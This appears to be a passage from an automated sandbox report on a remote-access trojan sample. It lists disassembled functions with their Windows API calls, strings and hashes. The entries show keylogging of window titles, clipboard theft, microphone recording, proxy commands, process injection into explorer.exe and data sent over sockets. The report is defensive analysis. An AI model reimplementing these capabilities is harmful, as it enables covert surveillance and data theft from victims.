                                                                                        Function 00414BB0 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 158COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 65535$udp
                                                                                        • API String ID: 0-1267037602
                                                                                        • Opcode ID: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                                                                                        • Instruction ID: ff24d6befd6f0703c902a6165bd45161ed4db0fb5f75d2635e7e580b9b2721aa
                                                                                        • Opcode Fuzzy Hash: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                                                                                        • Instruction Fuzzy Hash: EF51E7756093019FDB209B58E9057BB37A4AFC4755F08082FF881973A1E76DCCC1865E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040ACD6 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 156sleepCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __Init_thread_footer.LIBCMT ref: 0040AD38
                                                                                        • Sleep.KERNEL32(000001F4), ref: 0040AD43
                                                                                        • GetForegroundWindow.USER32 ref: 0040AD49
                                                                                        • GetWindowTextLengthW.USER32(00000000), ref: 0040AD52
                                                                                        • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040AD86
                                                                                        • Sleep.KERNEL32(000003E8), ref: 0040AE54
                                                                                          • Part of subcall function 0040A636: SetEvent.KERNEL32(00000000,?,00000000,0040B20A,00000000), ref: 0040A662
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                                        • String ID: [${ User has been idle for $ minutes }$]
                                                                                        • API String ID: 911427763-3954389425
                                                                                        • Opcode ID: d029bd4235179839c9baf363e6aa800d014436574332bd325cff9a7a557b710f
                                                                                        • Instruction ID: 3d5ee5432c15115af2c0f1375ae13a0ba8112eb59c463c5c733e63bb31497985
                                                                                        • Opcode Fuzzy Hash: d029bd4235179839c9baf363e6aa800d014436574332bd325cff9a7a557b710f
                                                                                        • Instruction Fuzzy Hash: 6D51B1316043419BD314FB21D846AAE7796AB84308F50093FF586A22E2EF7C9D45C69F
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0043A83A Relevance: 16.6, APIs: 11, Instructions: 116COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A892
                                                                                        • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A89F
                                                                                        • __dosmaperr.LIBCMT ref: 0043A8A6
                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8D2
                                                                                        • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8DC
                                                                                        • __dosmaperr.LIBCMT ref: 0043A8E3
                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A926
                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A930
                                                                                        • __dosmaperr.LIBCMT ref: 0043A937
                                                                                        • _free.LIBCMT ref: 0043A943
                                                                                        • _free.LIBCMT ref: 0043A94A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                        • String ID:
                                                                                        • API String ID: 2441525078-0
                                                                                        • Opcode ID: be2abdef093630236b46a14047e2354cdf10b582d669b9bb945715f91254eceb
                                                                                        • Instruction ID: 785efe6d9c8e3fffb8b85045f967b8474775cb8629fdf0d32462ae01257f7f2e
                                                                                        • Opcode Fuzzy Hash: be2abdef093630236b46a14047e2354cdf10b582d669b9bb945715f91254eceb
                                                                                        • Instruction Fuzzy Hash: FF31F57140420AFFDF01AFA5CC45DAF3B68EF09325F10021AF950662A1DB38CD21DB6A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004054A0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetEvent.KERNEL32(?,?), ref: 004054BF
                                                                                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040556F
                                                                                        • TranslateMessage.USER32(?), ref: 0040557E
                                                                                        • DispatchMessageA.USER32(?), ref: 00405589
                                                                                        • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                                                                        • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679
                                                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                        • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                        • API String ID: 2956720200-749203953
                                                                                        • Opcode ID: 23ad1bda7fdc8c2761b743bccdaa4a1370e03c4646df2a0694b798356af57b05
                                                                                        • Instruction ID: c1940132788662b917c5ec79ff16bb55de46c7435784779dc5fc992d72e4b12f
                                                                                        • Opcode Fuzzy Hash: 23ad1bda7fdc8c2761b743bccdaa4a1370e03c4646df2a0694b798356af57b05
                                                                                        • Instruction Fuzzy Hash: CE41A171604701ABCB14FB75DC5A86F37A9AB85704F40093EF916A36E1EF3C8905CB9A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00417CDF Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 108filesynchronizationCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00417F2C: __EH_prolog.LIBCMT ref: 00417F31
                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660A4), ref: 00417DDC
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00417DE5
                                                                                        • DeleteFileA.KERNEL32(00000000), ref: 00417DF4
                                                                                        • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DA8
                                                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                                                                        • String ID: 0VG$0VG$<$@$Temp
                                                                                        • API String ID: 1704390241-2575729100
                                                                                        • Opcode ID: 98959ef4594bcaafc024db97d5732f010b7230a0abd9b713f16470a190596f9f
                                                                                        • Instruction ID: cfce1e327495ca125f9f778a73892d1ad62a3a088d665d9de3c725e9e650d499
                                                                                        • Opcode Fuzzy Hash: 98959ef4594bcaafc024db97d5732f010b7230a0abd9b713f16470a190596f9f
                                                                                        • Instruction Fuzzy Hash: 0E415F319002099BCB14FB62DC56AEE7775AF40318F50417EF506764E1EF7C1A8ACB99
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00416940 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 46clipboardCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • OpenClipboard.USER32 ref: 00416941
                                                                                        • EmptyClipboard.USER32 ref: 0041694F
                                                                                        • CloseClipboard.USER32 ref: 00416955
                                                                                        • OpenClipboard.USER32 ref: 0041695C
                                                                                        • GetClipboardData.USER32(0000000D), ref: 0041696C
                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00416975
                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                                                                                        • CloseClipboard.USER32 ref: 00416984
                                                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                        • String ID: !D@
                                                                                        • API String ID: 2172192267-604454484
                                                                                        • Opcode ID: 217266dddd972f3c5e9f703bebafc66beb3104e9651149c41c4633369744174b
                                                                                        • Instruction ID: 305b70c8a6b081cbeb1fc088e42579eafb4add048c4ccd3ac1cf7446a02d8759
                                                                                        • Opcode Fuzzy Hash: 217266dddd972f3c5e9f703bebafc66beb3104e9651149c41c4633369744174b
                                                                                        • Instruction Fuzzy Hash: CC015E31214301DFC714BB72DC09AAE77A5AF88742F40047EF906821E2DF38CC44CA69
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0041AB0D Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB1C
                                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB33
                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB40
                                                                                        • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB4F
                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB60
                                                                                        • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB63
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Service$CloseHandle$Open$ControlManager
                                                                                        • String ID:
                                                                                        • API String ID: 221034970-0
                                                                                        • Opcode ID: c0082c5762a569dd6c794232c9d09aac69d1526d84f90b8f2ddcc8f825e948b5
                                                                                        • Instruction ID: 6fbe0b082825830d9e24babaefac53afed48758aa8e56b4d18e4903ff4329a9c
                                                                                        • Opcode Fuzzy Hash: c0082c5762a569dd6c794232c9d09aac69d1526d84f90b8f2ddcc8f825e948b5
                                                                                        • Instruction Fuzzy Hash: 41114C71901218AFD711AF64DCC4DFF3B7CDB42B62B000036FA05D2192DB289C46AAFA
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00448121 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _free.LIBCMT ref: 00448135
                                                                                          • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                                                                          • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                                                        • _free.LIBCMT ref: 00448141
                                                                                        • _free.LIBCMT ref: 0044814C
                                                                                        • _free.LIBCMT ref: 00448157
                                                                                        • _free.LIBCMT ref: 00448162
                                                                                        • _free.LIBCMT ref: 0044816D
                                                                                        • _free.LIBCMT ref: 00448178
                                                                                        • _free.LIBCMT ref: 00448183
                                                                                        • _free.LIBCMT ref: 0044818E
                                                                                        • _free.LIBCMT ref: 0044819C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                        • String ID:
                                                                                        • API String ID: 776569668-0
                                                                                        • Opcode ID: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                                                                                        • Instruction ID: 63500befab30bf138fa449b3e81d3956d19e40097f86fc95f12732a98ce5ff4f
                                                                                        • Opcode Fuzzy Hash: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                                                                                        • Instruction Fuzzy Hash: C211B67A500508BFEB01EF96C842CDD3BA5FF05359B0240AAFA588F222DA35DF509BC5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004114F5 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 191COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Eventinet_ntoa
                                                                                        • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                                                                        • API String ID: 3578746661-3604713145
                                                                                        • Opcode ID: ab18085dfb9070501b6a617d13a9934c7a772270e49a3b63cf56808473da2604
                                                                                        • Instruction ID: 71dfdc03858149a45142756d2b421c0b7bbb6d70992310a40494c7f1f0681c69
                                                                                        • Opcode Fuzzy Hash: ab18085dfb9070501b6a617d13a9934c7a772270e49a3b63cf56808473da2604
                                                                                        • Instruction Fuzzy Hash: 0051C131A042015BC614FB36C91AAAE37A5AB85344F40453FF906A76F1EF7C8985C7DE
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00455F04 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00456FFF), ref: 00455F27
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: DecodePointer
                                                                                        • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                        • API String ID: 3527080286-3064271455
                                                                                        • Opcode ID: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
                                                                                        • Instruction ID: ff4fc8d1aadbe784407353d8516796ad37925c88dabf63da6293f70e8270e0de
                                                                                        • Opcode Fuzzy Hash: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
                                                                                        • Instruction Fuzzy Hash: 16519F71900909CBCF10CF58E9485BEBBB0FF49306FA14197D841A73A6DB399D298B1E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0044B3BC Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 152fileCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetConsoleCP.KERNEL32(FF8BC35D,00000000,?,?,?,?,?,?,PkGNG,0044BB31,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B3FE
                                                                                        • __fassign.LIBCMT ref: 0044B479
                                                                                        • __fassign.LIBCMT ref: 0044B494
                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,FF8BC35D,00000005,00000000,00000000), ref: 0044B4BA
                                                                                        • WriteFile.KERNEL32(?,FF8BC35D,00000000,0044BB31,00000000,?,?,?,?,?,?,?,?,PkGNG,0044BB31,?), ref: 0044B4D9
                                                                                        • WriteFile.KERNEL32(?,?,00000001,0044BB31,00000000,?,?,?,?,?,?,?,?,PkGNG,0044BB31,?), ref: 0044B512
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                        • String ID: PkGNG
                                                                                        • API String ID: 1324828854-263838557
                                                                                        • Opcode ID: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                                                                                        • Instruction ID: 24f44d390d373c30b0d8a34eda065edd0bccebe0da4884afe324d1cece3cc5ea
                                                                                        • Opcode Fuzzy Hash: e1ab2fdd82c1bf82b8ea5de4eaaa1e5c3a736621917fd27297e58c6e874c6116
                                                                                        • Instruction Fuzzy Hash: 0751D270900208AFDB10CFA8D885AEEFBF4EF09305F14856BE955E7292D734D941CBA9
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00417495 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 104sleepfileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004174F5
                                                                                          • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                                                                                        • Sleep.KERNEL32(00000064), ref: 00417521
                                                                                        • DeleteFileW.KERNEL32(00000000), ref: 00417555
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$CreateDeleteExecuteShellSleep
                                                                                        • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                        • API String ID: 1462127192-2001430897
                                                                                        • Opcode ID: 2e7314534ae075b7e9c34f09803cfaa6cc8f3f1c8e39d8c57a36ae90e31f4a77
                                                                                        • Instruction ID: 51d64fe7c8a5c54eac4555a52c350958ac4104e8f54c8767ba2a87230734c78e
                                                                                        • Opcode Fuzzy Hash: 2e7314534ae075b7e9c34f09803cfaa6cc8f3f1c8e39d8c57a36ae90e31f4a77
                                                                                        • Instruction Fuzzy Hash: 1431307194011A9ADB04FB62DC96DED7779AF50309F40017EF606730E2EF785A8ACA9C
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004073AC Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 99COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 004073DD
                                                                                        • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407656,C:\Users\Public\Libraries\nmfsxfjX.pif), ref: 0040749E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CurrentProcess
                                                                                        • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                                                                        • API String ID: 2050909247-4242073005
                                                                                        • Opcode ID: c96af00a5e7ec94e66acc45bf1863d5a4294996af44aaa2752f51638bf238a49
                                                                                        • Instruction ID: f630994b7aed3d2c1b9b8fa2b3e4f68b22e8b08ead4833dea6669ff7d567ef23
                                                                                        • Opcode Fuzzy Hash: c96af00a5e7ec94e66acc45bf1863d5a4294996af44aaa2752f51638bf238a49
                                                                                        • Instruction Fuzzy Hash: 7031A471A04700ABD321FF65ED46F167BB8AB44305F10087EF515A6292E7B8B8448B6F
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00401D0B Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _strftime.LIBCMT ref: 00401D50
                                                                                          • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                                                        • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000,?), ref: 00401E02
                                                                                        • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                                                                        • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                        • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                                                                                        • API String ID: 3809562944-243156785
                                                                                        • Opcode ID: 5d5d8b804b24dbb182b265a24ad27abd29ffba8ef4e2f14911defadce340a58b
                                                                                        • Instruction ID: 027c37fd5a1300b84eaed5fd93cda356eabc1c7fedb6cd9f381e221a57c36ff8
                                                                                        • Opcode Fuzzy Hash: 5d5d8b804b24dbb182b265a24ad27abd29ffba8ef4e2f14911defadce340a58b
                                                                                        • Instruction Fuzzy Hash: 383181315043019FC324EB21DD46A9A77A8EB84314F40443EF18DA21F2EFB89A49CB5E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00410E61 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 75COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00410E6E
                                                                                        • int.LIBCPMT ref: 00410E81
                                                                                          • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                                                                                          • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                                                                                        • std::_Facet_Register.LIBCPMT ref: 00410EC1
                                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00410ECA
                                                                                        • __CxxThrowException@8.LIBVCRUNTIME ref: 00410EE8
                                                                                        • __Init_thread_footer.LIBCMT ref: 00410F29
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                                                        • String ID: ,kG$0kG
                                                                                        • API String ID: 3815856325-2015055088
                                                                                        • Opcode ID: 03644fa62921dd73c80b911a5d0dfda0042f6ff91148d324d9cd636e449b66af
                                                                                        • Instruction ID: 12cf7b7900226bd12227407fb3b1cbab205c4dd0745ae636880afd2a72082c2f
                                                                                        • Opcode Fuzzy Hash: 03644fa62921dd73c80b911a5d0dfda0042f6ff91148d324d9cd636e449b66af
                                                                                        • Instruction Fuzzy Hash: 162134329005249BC704EB6AD9428DE37A8EF48324F20056FF804A72D1DBB9AD81CB9D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00401BE9 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 71COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
